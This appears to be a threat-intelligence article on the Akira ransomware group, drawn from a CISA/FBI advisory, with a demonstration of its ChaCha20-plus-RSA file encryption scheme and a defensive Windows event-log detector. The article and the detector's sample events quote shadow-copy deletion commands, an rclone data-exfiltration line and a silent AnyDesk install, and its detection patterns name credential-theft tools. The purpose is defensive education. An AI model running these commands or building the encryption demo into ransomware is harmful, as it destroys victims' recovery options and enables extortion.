Akira Ransomware’s Global Onslaught: Over 250 Organizations Targeted, $244 Million Extorted
The Akira ransomware group has become one of the most prolific extortion operations active today, attacking more than 250 organizations across North America, Europe, and Australia since it first appeared in March 2023. According to the updated joint advisory from the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI, these operations had brought in approximately $244.17 million in ransom payments as of late September 2025.
Origins and Evolution
Akira shares code with the now-defunct Conti ransomware, suggesting its developers came out of that established criminal ecosystem rather than starting from scratch. Initially, Akira’s operations were confined to Windows systems, using a C++ encryptor that appended the .akira extension to encrypted files. By April 2023, the group had added a Linux variant targeting VMware ESXi hosts and the virtual machines they run, a deliberate shift towards hitting virtualized environments where a single host compromise encrypts many servers at once. The evolution continued in August 2023 with the Megazord encryptor, a Rust-based tool that appends a .powerranges extension to encrypted files.
Targeted Sectors
Akira’s attacks have predominantly affected small and medium-sized businesses across various sectors, including manufacturing, education, information technology, healthcare, and financial services. This broad targeting underscores the group’s opportunistic approach, exploiting vulnerabilities wherever they may exist.
Attack Vectors and Techniques
The group’s initial access relies heavily on exposed remote-access services. It logs into virtual private network (VPN) services that lack multi-factor authentication (MFA) and exploits known vulnerabilities in Cisco products. A particularly concerning recent tactic is the exploitation of CVE-2024-40766, a critical improper access control vulnerability in SonicWall’s SonicOS that affects the management interface and SSL VPN. The flaw lets an unauthenticated attacker reach resources behind those interfaces, giving the group a foothold from which to steal data and deploy ransomware. SonicWall has shipped patched firmware since August 2024 and also advised resetting the passwords of local SSL VPN accounts, because patching alone does not invalidate credentials harvested while a device was exposed; many organizations have done neither, and the vulnerability remains under active exploitation.
Technical Sophistication
Akira uses a hybrid encryption scheme: file contents are encrypted with the ChaCha20 stream cipher under a randomly generated per-file key, and that key is in turn encrypted with the attackers’ RSA public key. The symmetric cipher makes encrypting large volumes of data fast, while the asymmetric wrap means the file keys cannot be recovered from the encrypted files without the attackers’ RSA private key. In VMware environments, Akira’s operators (not the encryptor itself) have exploited CVE-2024-37085, an authentication bypass in VMware ESXi hypervisors joined to Active Directory: a domain-joined ESXi host grants full administrative access to every member of a domain group named “ESX Admins”, including a group created or renamed after the host was joined, so an attacker with enough rights to create a domain group obtains hypervisor administrator access. The Linux variant then encrypts the virtual machine files directly on the host. The malware is also reported to include commands that disable logging, hindering forensic analysis after the fact.
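To make the hybrid scheme concrete, here is an added Python example of the pattern the paragraph describes; it is not Akira’s code and is not taken from the advisory. It implements ChaCha20 per RFC 8439 in pure Python for the bulk data and a textbook RSA wrap for the per-file key. The RSA here is unpadded and generated with a simple Miller-Rabin search, which is enough to show the key flow but is not how a production system should wrap keys, and the “file format” (ciphertext plus a wrapped key blob) is an assumption made for the example.

```python
import secrets
import struct

MASK32 = 0xFFFFFFFF


def _rotl32(v: int, n: int) -> int:
    return ((v << n) | (v >> (32 - n))) & MASK32


def _quarter_round(s: list, a: int, b: int, c: int, d: int) -> None:
    """RFC 8439 section 2.1, applied in place to four 32-bit words of the state."""
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """One 64-byte keystream block: 256-bit key, 32-bit block counter, 96-bit nonce (RFC 8439 2.3)."""
    assert len(key) == 32 and len(nonce) == 12
    state = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574]  # "expand 32-byte k"
    state += struct.unpack("<8L", key)
    state.append(counter & MASK32)
    state += struct.unpack("<3L", nonce)
    work = list(state)
    for _ in range(10):  # 10 double rounds = 20 rounds (column rounds, then diagonal rounds)
        _quarter_round(work, 0, 4, 8, 12); _quarter_round(work, 1, 5, 9, 13)
        _quarter_round(work, 2, 6, 10, 14); _quarter_round(work, 3, 7, 11, 15)
        _quarter_round(work, 0, 5, 10, 15); _quarter_round(work, 1, 6, 11, 12)
        _quarter_round(work, 2, 7, 8, 13); _quarter_round(work, 3, 4, 9, 14)
    return struct.pack("<16L", *[(w + s) & MASK32 for w, s in zip(work, state)])


def chacha20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 1) -> bytes:
    """Encrypt or decrypt (same operation): XOR data with the keystream, block by block."""
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = chacha20_block(key, counter + i // 64, nonce)
        out += bytes(x ^ y for x, y in zip(data[i:i + 64], ks))
    return bytes(out)


def _is_probable_prime(n: int, rounds: int = 24) -> bool:
    """Miller-Rabin with random bases; sufficient for generating illustration keys."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(2 + secrets.randbelow(n - 3), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1  # exact bit length, odd
        if _is_probable_prime(cand):
            return cand


def rsa_keygen(bits: int = 1024):
    """Textbook RSA keypair ((n, e), (n, d)). Illustration only: no padding, no side-channel hardening."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e != 0:  # e is prime, so this guarantees gcd(e, phi) == 1
            return (p * q, e), (p * q, pow(e, -1, phi))


KEY_BLOB_LEN = 32 + 12  # ChaCha20 key + nonce; n must be longer than 352 bits (assumed format)


def encrypt_file(pub, plaintext: bytes):
    """Hybrid scheme: a fresh random ChaCha20 key and nonce per file, wrapped under the RSA public key."""
    n, e = pub
    file_key, nonce = secrets.token_bytes(32), secrets.token_bytes(12)
    ciphertext = chacha20_xor(file_key, nonce, plaintext)
    wrapped = pow(int.from_bytes(file_key + nonce, "big"), e, n)
    return ciphertext, wrapped.to_bytes((n.bit_length() + 7) // 8, "big")


def decrypt_file(priv, ciphertext: bytes, wrapped_key: bytes) -> bytes:
    """Only the RSA private key holder can unwrap the file key and run the XOR in reverse."""
    n, d = priv
    blob = pow(int.from_bytes(wrapped_key, "big"), d, n).to_bytes(KEY_BLOB_LEN, "big")
    return chacha20_xor(blob[:32], blob[32:], ciphertext)


if __name__ == "__main__":
    pub, priv = rsa_keygen()
    ct, wk = encrypt_file(pub, b"quarterly ledger, confidential\n" * 100)
    print(len(ct), "ciphertext bytes;", len(wk), "byte wrapped key; round trip ok:",
          decrypt_file(priv, ct, wk).startswith(b"quarterly"))
```

The point to take from it: the ciphertext and the wrapped blob reveal nothing about the file key, so recovering data requires either the attackers’ private key or an implementation flaw in the encryptor. When ransomware families have turned out to be decryptable in practice, it has been because of mistakes around the key material (predictable randomness, reused nonces, keys left in memory), which is why analysts concentrate on how a sample generates and stores keys rather than on the cipher itself.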
Double Extortion and Persistence
Operating on a double-extortion model, Akira not only encrypts data but also threatens to leak sensitive information unless a ransom is paid. After gaining initial access, the group establishes persistence by creating new domain accounts and uses credential-harvesting tools such as Mimikatz and LaZagne to collect passwords. It installs legitimate remote access tools such as AnyDesk and LogMeIn to keep a way back in that blends in with ordinary administrator activity. For exfiltration, tools such as FileZilla, WinSCP, and RClone transfer stolen data to cloud storage before encryption begins. To inhibit recovery, the Akira encryptor deletes Volume Shadow Copy Service snapshots on Windows systems with a PowerShell command of the form Get-WmiObject Win32_Shadowcopy | Remove-WmiObject.
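The tradecraft above (new domain accounts, the “ESX Admins” group trick from the previous section, shadow copy deletion, and the exfiltration and remote-access tools) all leaves traces in Windows Security and process-creation telemetry. The following Python detector is an added example, not code from the advisory or from any vendor product; it runs over constructed sample events in a simplified key=value export (the export format, hostnames and account names are assumptions made for the example), and the event IDs it keys on are the standard Windows ones: 4688 process creation, 4720 user account created, 4727 security-enabled global group created, 4731 security-enabled local group created.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample events (not from a real incident), in an assumed key=value
# export of Windows Security log entries. Field order is fixed:
# timestamp host event_id subject target cmd. Hosts and accounts are made up.
SAMPLE_LOG = r"""
2025-09-30T02:10:11Z host=DC01 event_id=4720 subject=CORP\jdoe target=CORP\svc_backup2 cmd=
2025-09-30T02:12:40Z host=DC01 event_id=4727 subject=CORP\jdoe target=CORP\ESX Admins cmd=
2025-09-30T02:14:05Z host=FS01 event_id=4688 subject=CORP\svc_backup2 target= cmd=powershell.exe -NoP -c "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"
2025-09-30T02:15:30Z host=FS01 event_id=4688 subject=CORP\svc_backup2 target= cmd=C:\Tools\rclone.exe copy D:\Finance remote:bucket --transfers 16
2025-09-30T02:16:02Z host=WS22 event_id=4688 subject=CORP\helpdesk target= cmd=vssadmin.exe list shadows
2025-09-30T02:17:45Z host=WS22 event_id=4688 subject=CORP\helpdesk target= cmd=C:\Windows\System32\svchost.exe -k netsvcs
2025-09-30T02:18:10Z host=WS22 event_id=4688 subject=CORP\jdoe target= cmd=AnyDesk.exe --install "C:\ProgramData\AnyDesk" --start-with-win --silent
2025-09-30T02:19:55Z host=FS01 event_id=4688 subject=CORP\svc_backup2 target= cmd=wmic shadowcopy delete /nointeractive
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) event_id=(?P<eid>\d+) "
    r"subject=(?P<subject>.*?) target=(?P<target>.*?) cmd=(?P<cmd>.*)$"
)

# Command-line patterns for the post-compromise tradecraft described in the advisory.
RULES = {
    # Shadow copy deletion via the PowerShell/WMI pipeline, vssadmin, or wmic.
    # "vssadmin list shadows" is deliberately not matched: listing is routine admin work.
    "shadow_copy_deletion": re.compile(
        r"Win32_Shadowcopy.*Remove-WmiObject"
        r"|vssadmin(\.exe)?\s+delete\s+shadows"
        r"|wmic(\.exe)?\s+shadowcopy\s+delete",
        re.IGNORECASE),
    "exfil_tool": re.compile(r"\b(rclone|winscp|filezilla)\b", re.IGNORECASE),
    "remote_access_tool": re.compile(r"\b(anydesk|logmein)\b", re.IGNORECASE),
    "credential_tool": re.compile(r"\b(mimikatz|lazagne)\b", re.IGNORECASE),
}


def parse_event(line: str) -> Optional[Dict[str, str]]:
    """Parse one export line into its fields, or None for blank/unparseable lines."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule an event matches (empty list means benign)."""
    hits: List[str] = []
    eid = ev["eid"]
    if eid == "4720":
        hits.append("new_account_created")  # persistence via a freshly created account
    if eid in ("4727", "4731"):
        # CVE-2024-37085: a group named "ESX Admins" is auto-admin on domain-joined ESXi hosts.
        group = ev["target"].rsplit("\\", 1)[-1].strip().lower()
        if group == "esx admins":
            hits.append("esx_admins_group_created")
    if eid == "4688":
        for name, pattern in RULES.items():
            if pattern.search(ev["cmd"]):
                hits.append(name)
    return hits


def scan(log_text: str) -> List[Dict[str, object]]:
    """Return one alert per event that matched at least one rule, in log order."""
    alerts: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if not ev:
            continue
        rules = classify(ev)
        if rules:
            alerts.append({"ts": ev["ts"], "host": ev["host"],
                           "subject": ev["subject"], "rules": rules})
    return alerts


def rule_counts(alerts: List[Dict[str, object]]) -> Counter:
    """How many times each rule fired; useful for a quick triage summary."""
    return Counter(r for a in alerts for r in a["rules"])


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["ts"], a["host"], a["subject"], ", ".join(a["rules"]))
```

Run against the sample, the detector flags the account and group creation on the domain controller, the shadow copy deletions and rclone run on the file server, and the silent AnyDesk install, while leaving the svchost and vssadmin list events alone. Tools such as rclone and AnyDesk are legitimate software, so the practical rule is to alert on them wherever they are not part of the sanctioned toolset, and to treat any shadow copy deletion outside a change window as an incident until proven otherwise.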
Global Impact
The United States has been the most affected country, followed by Canada, the United Kingdom, and Germany. The group has claimed over 350 victims globally. The April 2024 version of the advisory put its proceeds at approximately $42 million USD as of January 1, 2024; by late September 2025 that figure had grown to the roughly $244 million cited above. Victims are pressured to pay under the threat of having their data published on Akira’s Tor-hosted leak site, which imitates a command-line interface: visitors type commands such as leaks to list stolen data sets and download them via torrent links.
Mitigation Strategies
Organizations are urged to implement robust cybersecurity measures to defend against Akira’s tactics. Key recommendations include:
– Apply Patches Immediately: Update SonicWall, Cisco, VMware, and other vendors’ products to the patched firmware and software versions, and, for SonicWall devices that were exposed before patching, reset local SSL VPN account passwords.
– Enforce Multi-Factor Authentication (MFA): Require MFA on all remote access, especially VPN and remote administration, so that stolen or guessed passwords alone are not enough to get in.
– Restrict Access: Limit management access to trusted IP addresses and disable WAN management from the public internet.
– Monitor Networks: Watch for the post-compromise tradecraft described above, including newly created domain accounts, installation of remote-access tools such as AnyDesk, use of RClone, WinSCP, or FileZilla, and deletion of volume shadow copies.
– Educate Employees: Conduct regular training sessions to raise awareness about phishing attacks and the importance of strong, unique passwords.
Conclusion
The Akira ransomware group’s activities highlight the evolving and persistent nature of cyber threats. Their ability to adapt and exploit vulnerabilities across various platforms and sectors underscores the critical need for organizations to remain vigilant and proactive in their cybersecurity efforts. By implementing comprehensive security measures and fostering a culture of awareness, businesses can better protect themselves against such sophisticated attacks.